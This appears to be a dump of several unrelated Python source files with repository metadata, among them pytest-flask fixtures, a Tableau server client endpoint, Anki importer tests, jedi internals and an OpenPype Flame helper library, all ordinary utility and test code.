sep = ':'
if sep in server_name:
server_name, port = server_name.split(sep, 1)
return sep.join((server_name, new_port))
@pytest.fixture(scope='function')
def live_server(request, app, monkeypatch, pytestconfig):
"""Run application in a separate process.
When the ``live_server`` fixture is applied, the ``url_for`` function
works as expected::
def test_server_is_up_and_running(live_server):
index_url = url_for('index', _external=True)
assert index_url == 'http://localhost:5000/'
res = urllib2.urlopen(index_url)
assert res.code == 200
"""
port = pytestconfig.getvalue('live_server_port')
if port == 0:
# Bind to an open port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
host = pytestconfig.getvalue('live_server_host')
# Explicitly set application ``SERVER_NAME`` for test suite
# and restore original value on test teardown.
server_name = app.config['SERVER_NAME'] or 'localhost'
monkeypatch.setitem(app.config, 'SERVER_NAME',
_rewrite_server_name(server_name, str(port)))
clean_stop = request.config.getvalue('live_server_clean_stop')
server = LiveServer(app, host, port, clean_stop)
if request.config.getvalue('start_live_server'):
server.start()
request.addfinalizer(server.stop)
return server
@pytest.fixture
def config(app):
"""An application config."""
return app.config
@pytest.fixture
def request_ctx(app):
"""The request context which contains all request relevant information,
e.g. `session`, `g`, `flashes`, etc.
"""
return _request_ctx_stack.top
@pytest.fixture(params=['application/json', 'text/html'])
def mimetype(request):
return request.param
def _make_accept_header(mimetype):
return [('Accept', mimetype)]
@pytest.fixture
def accept_mimetype(mimetype):
return _make_accept_header(mimetype)
@pytest.fixture
def accept_json(request):
return _make_accept_header('application/json')
@pytest.fixture
def accept_jsonp():
return _make_accept_header('application/json-p')
@pytest.fixture(params=['*', '*/*'])
def accept_any(request):
return _make_accept_header(request.param)
| 28.213592 | 89 | 0.635754 | 2,223 | 0.382485 | 176 | 0.030282 | 2,889 | 0.497075 | 0 | 0 | 2,374 | 0.408465 |
c7be8fc77e58c39c645eb0be54b3d89d725dc934 | 7,700 | py | Python | tableauserverclient/server/endpoint/endpoint.py | jorwoods/server-client-python | fefd6f18d8a6617829c6323879d2c3ed77a4cda6 | [
"CC0-1.0",
"MIT"
]
| 1 | 2021-12-22T21:34:17.000Z | 2021-12-22T21:34:17.000Z | tableauserverclient/server/endpoint/endpoint.py | jorwoods/server-client-python | fefd6f18d8a6617829c6323879d2c3ed77a4cda6 | [
"CC0-1.0",
"MIT"
]
| null | null | null | tableauserverclient/server/endpoint/endpoint.py | jorwoods/server-client-python | fefd6f18d8a6617829c6323879d2c3ed77a4cda6 | [
"CC0-1.0",
"MIT"
]
| null | null | null | from .exceptions import (
ServerResponseError,
InternalServerError,
NonXMLResponseError,
EndpointUnavailableError,
)
from functools import wraps
from xml.etree.ElementTree import ParseError
from ..query import QuerySet
import logging
try:
from distutils2.version import NormalizedVersion as Version
except ImportError:
from distutils.version import LooseVersion as Version
logger = logging.getLogger("tableau.endpoint")
Success_codes = [200, 201, 202, 204]
class Endpoint(object):
def __init__(self, parent_srv):
self.parent_srv = parent_srv
@staticmethod
def _make_common_headers(auth_token, content_type):
headers = {}
if auth_token is not None:
headers["x-tableau-auth"] = auth_token
if content_type is not None:
headers["content-type"] = content_type
return headers
@staticmethod
def _safe_to_log(server_response):
"""Checks if the server_response content is not xml (eg binary image or zip)
and replaces it with a constant
"""
ALLOWED_CONTENT_TYPES = ("application/xml", "application/xml;charset=utf-8")
if server_response.headers.get("Content-Type", None) not in ALLOWED_CONTENT_TYPES:
return "[Truncated File Contents]"
else:
return server_response.content
def _make_request(
self,
method,
url,
content=None,
auth_token=None,
content_type=None,
parameters=None,
):
parameters = parameters or {}
parameters.update(self.parent_srv.http_options)
parameters["headers"] = Endpoint._make_common_headers(auth_token, content_type)
if content is not None:
parameters["data"] = content
logger.debug(u"request {}, url: {}".format(method.__name__, url))
if content:
logger.debug(u"request content: {}".format(content[:1000]))
server_response = method(url, **parameters)
self.parent_srv._namespace.detect(server_response.content)
self._check_status(server_response)
# This check is to determine if the response is a text response (xml or otherwise)
# so that we do not attempt to log bytes and other binary data.
if len(server_response.content) > 0 and server_response.encoding:
logger.debug(
u"Server response from {0}:\n\t{1}".format(
url, server_response.content.decode(server_response.encoding)
)
)
return server_response
def _check_status(self, server_response):
if server_response.status_code >= 500:
raise InternalServerError(server_response)
elif server_response.status_code not in Success_codes:
try:
raise ServerResponseError.from_response(server_response.content, self.parent_srv.namespace)
except ParseError:
# This will happen if we get a non-success HTTP code that
# doesn't return an xml error object (like metadata endpoints)
# we convert this to a better exception and pass through the raw
# response body
raise NonXMLResponseError(server_response.content)
except Exception:
# anything else re-raise here
raise
def get_unauthenticated_request(self, url):
return self._make_request(self.parent_srv.session.get, url)
def get_request(self, url, request_object=None, parameters=None):
if request_object is not None:
try:
# Query param delimiters don't need to be encoded for versions before 3.7 (2020.1)
self.parent_srv.assert_at_least_version("3.7")
parameters = parameters or {}
parameters["params"] = request_object.get_query_params()
except EndpointUnavailableError:
url = request_object.apply_query_params(url)
return self._make_request(
self.parent_srv.session.get,
url,
auth_token=self.parent_srv.auth_token,
parameters=parameters,
)
def delete_request(self, url):
# We don't return anything for a delete
self._make_request(self.parent_srv.session.delete, url, auth_token=self.parent_srv.auth_token)
def put_request(self, url, xml_request=None, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.put,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def post_request(self, url, xml_request, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.post,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def api(version):
"""Annotate the minimum supported version for an endpoint.
Checks the version on the server object and compares normalized versions.
It will raise an exception if the server version is > the version specified.
Args:
`version` minimum version that supports the endpoint. String.
Raises:
EndpointUnavailableError
Returns:
None
Example:
>>> @api(version="2.3")
>>> def get(self, req_options=None):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.parent_srv.assert_at_least_version(version)
return func(self, *args, **kwargs)
return wrapper
return _decorator
def parameter_added_in(**params):
"""Annotate minimum versions for new parameters or request options on an endpoint.
The api decorator documents when an endpoint was added, this decorator annotates
keyword arguments on endpoints that may control functionality added after an endpoint was introduced.
The REST API will ignore invalid parameters in most cases, so this raises a warning instead of throwing
an exception.
Args:
Key/value pairs of the form `parameter`=`version`. Kwargs.
Raises:
UserWarning
Returns:
None
Example:
>>> @api(version="2.0")
>>> @parameter_added_in(no_extract='2.5')
>>> def download(self, workbook_id, filepath=None, extract_only=False):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
import warnings
server_ver = Version(self.parent_srv.version or "0.0")
params_to_check = set(params) & set(kwargs)
for p in params_to_check:
min_ver = Version(str(params[p]))
if server_ver < min_ver:
error = "{!r} not available in {}, it will be ignored. Added in {}".format(p, server_ver, min_ver)
warnings.warn(error)
return func(self, *args, **kwargs)
return wrapper
return _decorator
class QuerysetEndpoint(Endpoint):
@api(version="2.0")
def all(self, *args, **kwargs):
queryset = QuerySet(self)
return queryset
@api(version="2.0")
def filter(self, *args, **kwargs):
queryset = QuerySet(self).filter(**kwargs)
return queryset
@api(version="2.0")
def order_by(self, *args, **kwargs):
queryset = QuerySet(self).order_by(*args)
return queryset
@api(version="2.0")
def paginate(self, **kwargs):
queryset = QuerySet(self).paginate(**kwargs)
return queryset
| 33.189655 | 118 | 0.632597 | 5,068 | 0.658182 | 0 | 0 | 1,975 | 0.256494 | 0 | 0 | 2,171 | 0.281948 |
c7c0ec1f2d22d969372f765fb0d7aef4a98be04f | 4,617 | py | Python | spec/test_importer.py | lajohnston/anki-freeplane | 746e3dd714653df428f0541609b9c51e29cd2726 | [
"MIT"
]
| 15 | 2016-10-06T00:27:26.000Z | 2022-03-04T04:24:50.000Z | spec/test_importer.py | eljay26/anki-freeplane | 746e3dd714653df428f0541609b9c51e29cd2726 | [
"MIT"
]
| null | null | null | spec/test_importer.py | eljay26/anki-freeplane | 746e3dd714653df428f0541609b9c51e29cd2726 | [
"MIT"
]
| 6 | 2016-11-08T06:55:47.000Z | 2021-03-24T22:15:14.000Z | import unittest
from freeplane_importer.importer import Importer
from mock import Mock
from mock import MagicMock
from mock import call
from freeplane_importer.model_not_found_exception import ModelNotFoundException
class TestImporter(unittest.TestCase):
def setUp(self):
self.mock_collection = Mock()
self.mock_model = MagicMock()
self.mock_collection.models.byName.return_value = self.mock_model
self.mock_note = MagicMock()
self.mock_note.model.return_value = self.mock_model
self.mock_collection.newNote.return_value = self.mock_note
self.mock_collection.models.fieldNames.return_value = []
self.importer = Importer(self.mock_collection)
self.mock_collection.db.scalar.return_value = None
self.note = {
'id': 100,
'deck': 'History',
'model': 'Basic',
'fields': {}
}
def test_it_should_initialise_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.setCurrent.assert_called_with(
self.mock_model)
def test_it_should_select_the_correct_deck(self):
self.mock_collection.decks.id.return_value = 100
self.importer = Importer(self.mock_collection)
self.importer.import_note(self.note)
self.mock_model.__setitem__.assert_called_with('did', 100)
self.mock_collection.decks.id.assert_called_with('History')
def test_it_should_find_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.byName.assert_called_with('Basic')
def test_it_should_return_true_if_note_was_added_successfully(self):
self.assertTrue(self.importer.import_note(self.note))
def test_it_should_raise_a_no_model_exception_if_the_model_does_not_exist(self):
self.mock_collection.models.byName.return_value = None
self.assertRaises(ModelNotFoundException,
self.importer.import_note, self.note)
def test_it_should_create_a_new_note(self):
self.importer.import_note(self.note)
self.mock_collection.newNote.assert_called_with()
def test_it_should_get_the_field_names_from_the_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.fieldNames.assert_called_with(
self.mock_model)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_lowercase(self):
self.mock_collection.models.fieldNames.return_value = ['id']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('id', 100)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_uppercase(self):
self.mock_collection.models.fieldNames.return_value = ['ID']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('ID', 100)
def test_it_should_populate_the_note_with_the_field_values(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front', 'Back']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_has_calls(
[call('Front', 'Front value'), call('Back', 'Back value')])
def test_it_should_ignore_fields_that_do_not_exist_in_the_model(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front']
self.importer.import_note(self.note)
self.assertFalse('Back' in self.mock_note)
def test_it_should_save_the_note_changes(self):
self.importer.import_note(self.note)
self.mock_note.flush.assert_called_with()
def test_it_should_attempt_to_find_an_existing_note_with_the_given_node_id(self):
self.mock_collection.getNote.return_value = self.mock_note
self.mock_collection.db.scalar.return_value = 123
self.importer.import_note(self.note)
self.mock_collection.getNote.assert_called_with(123)
def test_it_should_add_the_note_to_the_collection_if_it_is_new(self):
del self.mock_note.mod
self.importer.import_note(self.note)
self.mock_collection.addNote.assert_called_with(self.mock_note)
def test_it_should_not_add_the_note_to_the_collection_if_it_is_not_new(self):
self.importer.import_note(self.note)
self.assertEqual(0, self.mock_collection.addNote.call_count)
| 38.157025 | 90 | 0.719731 | 4,397 | 0.95235 | 0 | 0 | 0 | 0 | 0 | 0 | 234 | 0.050682 |
c7c11d6e36451e4175726cdb9543215d1fb0fff9 | 1,089 | py | Python | analysis/fitexp.py | mfkasim91/idcovid19 | 3e51b16354581a4e0defc635f837f93faff26afc | [
"BSD-3-Clause"
]
| null | null | null | analysis/fitexp.py | mfkasim91/idcovid19 | 3e51b16354581a4e0defc635f837f93faff26afc | [
"BSD-3-Clause"
]
| null | null | null | analysis/fitexp.py | mfkasim91/idcovid19 | 3e51b16354581a4e0defc635f837f93faff26afc | [
"BSD-3-Clause"
]
| null | null | null | import argparse
import numpy as np
from scipy.stats import linregress
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument("--plot", action="store_const", default=False, const=True)
args = parser.parse_args()
data = np.loadtxt("../data/data.csv", skiprows=1, usecols=list(range(1,8)), delimiter=",")[33:,:]
xdays = data[:,0] - np.mean(data[:,0])
deaths = data[:,-1]
print(xdays, deaths)
logdeaths = np.log(deaths)
slope, offset, rval, pval, stderr = linregress(xdays, logdeaths)
stderr = np.sqrt(np.sum((logdeaths-(slope*xdays+offset))**2) / (len(logdeaths)-2.)) / np.sqrt(np.sum((xdays - np.mean(xdays))**2))
if args.plot:
plt.plot(xdays, np.exp(offset + slope*xdays), 'C0-')
plt.plot(xdays, np.exp(offset + (slope+stderr)*xdays), 'C0--')
plt.plot(xdays, np.exp(offset + (slope-stderr)*xdays), 'C0--')
plt.plot(xdays, deaths, 'C0o')
plt.gca().set_yscale("log")
plt.show()
print("Slope: %.3e" % slope)
print("Doubling every: %.2f" % (np.log(2)/slope))
print("R-squared: %.3f" % (rval*rval))
print("Stderr: %.3e" % stderr)
| 35.129032 | 134 | 0.665748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.123967 |
c7c22a9174889ccacec698f1b477ffd20a7822b0 | 1,716 | py | Python | .venv/lib/python3.7/site-packages/jedi/inference/lazy_value.py | ITCRStevenLPZ/Proyecto2-Analisis-de-Algoritmos | 4acdbc423428fb2e0068720add69e7870c87929a | [
"Apache-2.0"
]
| 76 | 2020-07-06T14:44:05.000Z | 2022-02-14T15:30:21.000Z | .venv/lib/python3.7/site-packages/jedi/inference/lazy_value.py | ITCRStevenLPZ/Proyecto2-Analisis-de-Algoritmos | 4acdbc423428fb2e0068720add69e7870c87929a | [
"Apache-2.0"
]
| 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | .venv/lib/python3.7/site-packages/jedi/inference/lazy_value.py | ITCRStevenLPZ/Proyecto2-Analisis-de-Algoritmos | 4acdbc423428fb2e0068720add69e7870c87929a | [
"Apache-2.0"
]
| 11 | 2020-07-12T16:18:07.000Z | 2022-02-05T16:48:35.000Z | from jedi.inference.base_value import ValueSet, NO_VALUES
from jedi.common import monkeypatch
class AbstractLazyValue(object):
def __init__(self, data, min=1, max=1):
self.data = data
self.min = min
self.max = max
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.data)
def infer(self):
raise NotImplementedError
class LazyKnownValue(AbstractLazyValue):
"""data is a Value."""
def infer(self):
return ValueSet([self.data])
class LazyKnownValues(AbstractLazyValue):
"""data is a ValueSet."""
def infer(self):
return self.data
class LazyUnknownValue(AbstractLazyValue):
def __init__(self, min=1, max=1):
super(LazyUnknownValue, self).__init__(None, min, max)
def infer(self):
return NO_VALUES
class LazyTreeValue(AbstractLazyValue):
def __init__(self, context, node, min=1, max=1):
super(LazyTreeValue, self).__init__(node, min, max)
self.context = context
# We need to save the predefined names. It's an unfortunate side effect
# that needs to be tracked otherwise results will be wrong.
self._predefined_names = dict(context.predefined_names)
def infer(self):
with monkeypatch(self.context, 'predefined_names', self._predefined_names):
return self.context.infer_node(self.data)
def get_merged_lazy_value(lazy_values):
if len(lazy_values) > 1:
return MergedLazyValues(lazy_values)
else:
return lazy_values[0]
class MergedLazyValues(AbstractLazyValue):
"""data is a list of lazy values."""
def infer(self):
return ValueSet.from_sets(l.infer() for l in self.data)
| 27.677419 | 83 | 0.674825 | 1,448 | 0.843823 | 0 | 0 | 0 | 0 | 0 | 0 | 241 | 0.140443 |
c7c399f4aa408e4541e327b125cd44ba175da7ef | 1,901 | py | Python | percept/plot.py | joshleeb/PerceptronVis | 2d0e2f1969e11498533f190f5598c174b7584513 | [
"MIT"
]
| null | null | null | percept/plot.py | joshleeb/PerceptronVis | 2d0e2f1969e11498533f190f5598c174b7584513 | [
"MIT"
]
| null | null | null | percept/plot.py | joshleeb/PerceptronVis | 2d0e2f1969e11498533f190f5598c174b7584513 | [
"MIT"
]
| null | null | null | import matplotlib.lines as lines
import matplotlib.pyplot as plt
COLOR_CLASSIFICATIONS = [
'black', # Unclassified
'blue', # Classified True (1)
'red' # Classified False (0)
]
def generate_line(ax, p0, p1, color='black', style='-'):
'''
Generates a line between points p0 and p1 which extends to be the width of
the plot.
'''
x0, y0 = p0
x1, y1 = p1
gradient = (y0 - y1) / (x0 - x1)
intercept = y1 - gradient * x1
x = ax.get_xlim()
data_y = [x[0] * gradient + intercept, x[1] * gradient + intercept]
return lines.Line2D(x, data_y, color=color, linestyle=style)
def get_boundary_plot_fn(weights):
'''
    Gets the function used to plot the line represented by the
    perceptron's weights. The equation is: f(x) = -(w1/w2)x - w0/w2.
'''
def fn(x):
return -weights[1] / weights[2] * x - weights[0] / weights[2]
return fn
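# Minimal usage sketch for the boundary function above, with hypothetical
# weights [w0, w1, w2] = [-1.0, 2.0, 4.0] (bias first, matching the
# f(x) = -(w1/w2)x - w0/w2 form):
#
#   boundary = get_boundary_plot_fn([-1.0, 2.0, 4.0])
#   boundary(0.0)  # -> 0.25, the boundary's y-intercept (-w0/w2)
#   boundary(1.0)  # -> -0.25, after applying the slope -w1/w2 = -0.5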
def get_point_color(point, colors):
'''
    Gets the color of the point to be displayed.
'''
if point.classification is None:
return colors[0]
return colors[1] if point.classification else colors[2]
def generate(title, class_boundary, weights, points, bounds):
'''
    Generates a scatter plot of points with the actual classification boundary
and the perceptron's classification boundary drawn in.
'''
boundary_fn = get_boundary_plot_fn(weights)
fig, ax = plt.subplots(figsize=(8, 8))
ax.set_xlim(bounds[0])
ax.set_ylim(bounds[1])
ax.set_title(title)
ax.add_line(generate_line(
ax, class_boundary[0], class_boundary[1], 'cyan', '--'
))
ax.add_line(generate_line(ax, (0, boundary_fn(0)), (1, boundary_fn(1))))
ax.scatter(
[pt.x for pt in points], [pt.y for pt in points],
c=[get_point_color(pt, COLOR_CLASSIFICATIONS) for pt in points], s=30
)
return fig
| 29.246154 | 79 | 0.637559 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 570 | 0.299842 |
c7c444c1fb4481f333fa9c3252930b474ff296c2 | 27,392 | py | Python | openpype/hosts/flame/api/lib.py | j-cube/OpenPype | f0849cbd08070a320d19bb55b7e368189a57e3ab | [
"MIT"
]
| 1 | 2022-02-08T15:40:41.000Z | 2022-02-08T15:40:41.000Z | openpype/hosts/flame/api/lib.py | zafrs/OpenPype | 4b8e7e1ed002fc55b31307efdea70b0feaed474f | [
"MIT"
]
| 2 | 2022-03-18T01:46:03.000Z | 2022-03-18T01:46:16.000Z | openpype/hosts/flame/api/lib.py | zafrs/OpenPype | 4b8e7e1ed002fc55b31307efdea70b0feaed474f | [
"MIT"
]
| null | null | null | import sys
import os
import re
import json
import pickle
import tempfile
import itertools
import contextlib
import xml.etree.cElementTree as cET
from copy import deepcopy
from xml.etree import ElementTree as ET
from pprint import pformat
from .constants import (
MARKER_COLOR,
MARKER_DURATION,
MARKER_NAME,
COLOR_MAP,
MARKER_PUBLISH_DEFAULT
)
import openpype.api as openpype
log = openpype.Logger.get_logger(__name__)
FRAME_PATTERN = re.compile(r"[\._](\d+)[\.]")
class CTX:
# singleton used for passing data between api modules
app_framework = None
flame_apps = []
selection = None
@contextlib.contextmanager
def io_preferences_file(klass, filepath, write=False):
try:
flag = "w" if write else "r"
yield open(filepath, flag)
except IOError as _error:
klass.log.info("Unable to work with preferences `{}`: {}".format(
filepath, _error))
class FlameAppFramework(object):
# flameAppFramework class takes care of preferences
class prefs_dict(dict):
def __init__(self, master, name, **kwargs):
self.name = name
self.master = master
if not self.master.get(self.name):
self.master[self.name] = {}
self.master[self.name].__init__()
def __getitem__(self, k):
return self.master[self.name].__getitem__(k)
def __setitem__(self, k, v):
return self.master[self.name].__setitem__(k, v)
def __delitem__(self, k):
return self.master[self.name].__delitem__(k)
def get(self, k, default=None):
return self.master[self.name].get(k, default)
def setdefault(self, k, default=None):
return self.master[self.name].setdefault(k, default)
def pop(self, *args, **kwargs):
return self.master[self.name].pop(*args, **kwargs)
def update(self, mapping=(), **kwargs):
self.master[self.name].update(mapping, **kwargs)
def __contains__(self, k):
return self.master[self.name].__contains__(k)
        def copy(self):  # don't delegate w/ super - dict.copy() -> dict :(
return type(self)(self)
def keys(self):
return self.master[self.name].keys()
@classmethod
def fromkeys(cls, keys, v=None):
return cls.master[cls.name].fromkeys(keys, v)
def __repr__(self):
return "{0}({1})".format(
type(self).__name__, self.master[self.name].__repr__())
def master_keys(self):
return self.master.keys()
def __init__(self):
self.name = self.__class__.__name__
self.bundle_name = "OpenPypeFlame"
# self.prefs scope is limited to flame project and user
self.prefs = {}
self.prefs_user = {}
self.prefs_global = {}
self.log = log
try:
import flame
self.flame = flame
self.flame_project_name = self.flame.project.current_project.name
self.flame_user_name = flame.users.current_user.name
except Exception:
self.flame = None
self.flame_project_name = None
self.flame_user_name = None
import socket
self.hostname = socket.gethostname()
if sys.platform == "darwin":
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
"Library",
"Caches",
"OpenPype",
self.bundle_name
)
elif sys.platform.startswith("linux"):
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
".OpenPype",
self.bundle_name)
self.prefs_folder = os.path.join(
self.prefs_folder,
self.hostname,
)
self.log.info("[{}] waking up".format(self.__class__.__name__))
try:
self.load_prefs()
except RuntimeError:
self.save_prefs()
# menu auto-refresh defaults
if not self.prefs_global.get("menu_auto_refresh"):
self.prefs_global["menu_auto_refresh"] = {
"media_panel": True,
"batch": True,
"main_menu": True,
"timeline_menu": True
}
self.apps = []
def get_pref_file_paths(self):
prefix = self.prefs_folder + os.path.sep + self.bundle_name
prefs_file_path = "_".join([
prefix, self.flame_user_name,
self.flame_project_name]) + ".prefs"
prefs_user_file_path = "_".join([
prefix, self.flame_user_name]) + ".prefs"
prefs_global_file_path = prefix + ".prefs"
return (prefs_file_path, prefs_user_file_path, prefs_global_file_path)
def load_prefs(self):
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path) as prefs_file:
self.prefs = pickle.load(prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path) as prefs_file:
self.prefs_user = pickle.load(prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path) as prefs_file:
self.prefs_global = pickle.load(prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def save_prefs(self):
# make sure the preference folder is available
if not os.path.isdir(self.prefs_folder):
try:
os.makedirs(self.prefs_folder)
except Exception:
self.log.info("Unable to create folder {}".format(
self.prefs_folder))
return False
# get all pref file paths
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path, True) as prefs_file:
pickle.dump(self.prefs, prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path, True) as prefs_file:
pickle.dump(self.prefs_user, prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path, True) as prefs_file:
pickle.dump(self.prefs_global, prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def get_current_project():
import flame
return flame.project.current_project
def get_current_sequence(selection):
import flame
def segment_to_sequence(_segment):
track = _segment.parent
version = track.parent
return version.parent
process_timeline = None
if len(selection) == 1:
if isinstance(selection[0], flame.PySequence):
process_timeline = selection[0]
if isinstance(selection[0], flame.PySegment):
process_timeline = segment_to_sequence(selection[0])
else:
for segment in selection:
if isinstance(segment, flame.PySegment):
process_timeline = segment_to_sequence(segment)
break
return process_timeline
def rescan_hooks():
import flame
try:
flame.execute_shortcut('Rescan Python Hooks')
except Exception:
pass
def get_metadata(project_name, _log=None):
# TODO: can be replaced by MediaInfoFile class method
from adsk.libwiretapPythonClientAPI import (
WireTapClient,
WireTapServerHandle,
WireTapNodeHandle,
WireTapStr
)
class GetProjectColorPolicy(object):
def __init__(self, host_name=None, _log=None):
# Create a connection to the Backburner manager using the Wiretap
# python API.
#
self.log = _log or log
self.host_name = host_name or "localhost"
self._wiretap_client = WireTapClient()
if not self._wiretap_client.init():
raise Exception("Could not initialize Wiretap Client")
self._server = WireTapServerHandle(
"{}:IFFFS".format(self.host_name))
def process(self, project_name):
policy_node_handle = WireTapNodeHandle(
self._server,
"/projects/{}/syncolor/policy".format(project_name)
)
self.log.info(policy_node_handle)
policy = WireTapStr()
if not policy_node_handle.getNodeTypeStr(policy):
self.log.warning(
"Could not retrieve policy of '%s': %s" % (
policy_node_handle.getNodeId().id(),
policy_node_handle.lastError()
)
)
return policy.c_str()
policy_wiretap = GetProjectColorPolicy(_log=_log)
return policy_wiretap.process(project_name)
def get_segment_data_marker(segment, with_marker=None):
"""
Get openpype track item tag created by creator or loader plugin.
Attributes:
segment (flame.PySegment): flame api object
with_marker (bool)[optional]: if true it will return also marker object
Returns:
dict: openpype tag data
Returns(with_marker=True):
flame.PyMarker, dict
"""
for marker in segment.markers:
comment = marker.comment.get_value()
color = marker.colour.get_value()
name = marker.name.get_value()
if (name == MARKER_NAME) and (
color == COLOR_MAP[MARKER_COLOR]):
if not with_marker:
return json.loads(comment)
else:
return marker, json.loads(comment)
def set_segment_data_marker(segment, data=None):
"""
Set openpype track item tag to input segment.
    Attributes:
        segment (flame.PySegment): flame api object
        data (dict)[optional]: data to store in the segment's marker

    Returns:
        None
    """
data = data or dict()
marker_data = get_segment_data_marker(segment, True)
if marker_data:
# get available openpype tag if any
marker, tag_data = marker_data
# update tag data with new data
tag_data.update(data)
# update marker with tag data
marker.comment = json.dumps(tag_data)
else:
# update tag data with new data
marker = create_segment_data_marker(segment)
# add tag data to marker's comment
marker.comment = json.dumps(data)
def set_publish_attribute(segment, value):
""" Set Publish attribute in input Tag object
Attribute:
segment (flame.PySegment)): flame api object
value (bool): True or False
"""
tag_data = get_segment_data_marker(segment)
tag_data["publish"] = value
# set data to the publish attribute
set_segment_data_marker(segment, tag_data)
def get_publish_attribute(segment):
""" Get Publish attribute from input Tag object
Attribute:
segment (flame.PySegment)): flame api object
Returns:
bool: True or False
"""
tag_data = get_segment_data_marker(segment)
if not tag_data:
set_publish_attribute(segment, MARKER_PUBLISH_DEFAULT)
return MARKER_PUBLISH_DEFAULT
return tag_data["publish"]
def create_segment_data_marker(segment):
""" Create openpype marker on a segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
flame.PyMarker: flame api object
"""
# get duration of segment
duration = segment.record_duration.relative_frame
# calculate start frame of the new marker
start_frame = int(segment.record_in.relative_frame) + int(duration / 2)
# create marker
marker = segment.create_marker(start_frame)
# set marker name
marker.name = MARKER_NAME
# set duration
marker.duration = MARKER_DURATION
# set colour
marker.colour = COLOR_MAP[MARKER_COLOR] # Red
return marker
def get_sequence_segments(sequence, selected=False):
segments = []
# loop versions in sequence
for ver in sequence.versions:
# loop track in versions
for track in ver.tracks:
# ignore all empty tracks and hidden too
if len(track.segments) == 0 and track.hidden:
continue
# loop all segment in remaining tracks
for segment in track.segments:
if segment.name.get_value() == "":
continue
if segment.hidden.get_value() is True:
continue
if (
selected is True
and segment.selected.get_value() is not True
):
continue
# add it to original selection
segments.append(segment)
return segments
@contextlib.contextmanager
def maintained_segment_selection(sequence):
"""Maintain selection during context
Attributes:
sequence (flame.PySequence): python api object
Yield:
list of flame.PySegment
Example:
>>> with maintained_segment_selection(sequence) as selected_segments:
... for segment in selected_segments:
... segment.selected = False
>>> print(segment.selected)
True
"""
selected_segments = get_sequence_segments(sequence, True)
try:
# do the operation on selected segments
yield selected_segments
finally:
# reset all selected clips
reset_segment_selection(sequence)
# select only original selection of segments
for segment in selected_segments:
segment.selected = True
def reset_segment_selection(sequence):
"""Deselect all selected nodes
"""
for ver in sequence.versions:
for track in ver.tracks:
if len(track.segments) == 0 and track.hidden:
continue
for segment in track.segments:
segment.selected = False
def _get_shot_tokens_values(clip, tokens):
old_value = None
output = {}
if not clip.shot_name:
return output
old_value = clip.shot_name.get_value()
for token in tokens:
clip.shot_name.set_value(token)
_key = str(re.sub("[<>]", "", token)).replace(" ", "_")
try:
output[_key] = int(clip.shot_name.get_value())
except ValueError:
output[_key] = clip.shot_name.get_value()
clip.shot_name.set_value(old_value)
return output
def get_segment_attributes(segment):
if segment.name.get_value() == "":
return None
# Add timeline segment to tree
clip_data = {
"shot_name": segment.shot_name.get_value(),
"segment_name": segment.name.get_value(),
"segment_comment": segment.comment.get_value(),
"tape_name": segment.tape_name,
"source_name": segment.source_name,
"fpath": segment.file_path,
"PySegment": segment
}
# head and tail with forward compatibility
if segment.head:
# `infinite` can be also returned
if isinstance(segment.head, str):
clip_data["segment_head"] = 0
else:
clip_data["segment_head"] = int(segment.head)
if segment.tail:
# `infinite` can be also returned
if isinstance(segment.tail, str):
clip_data["segment_tail"] = 0
else:
clip_data["segment_tail"] = int(segment.tail)
# add all available shot tokens
shot_tokens = _get_shot_tokens_values(segment, [
"<colour space>", "<width>", "<height>", "<depth>", "<segment>",
"<track>", "<track name>"
])
clip_data.update(shot_tokens)
# populate shot source metadata
segment_attrs = [
"record_duration", "record_in", "record_out",
"source_duration", "source_in", "source_out"
]
segment_attrs_data = {}
for attr_name in segment_attrs:
if not hasattr(segment, attr_name):
continue
attr = getattr(segment, attr_name)
segment_attrs_data[attr] = str(attr).replace("+", ":")
if attr_name in ["record_in", "record_out"]:
clip_data[attr_name] = attr.relative_frame
else:
clip_data[attr_name] = attr.frame
clip_data["segment_timecodes"] = segment_attrs_data
return clip_data
def get_clips_in_reels(project):
output_clips = []
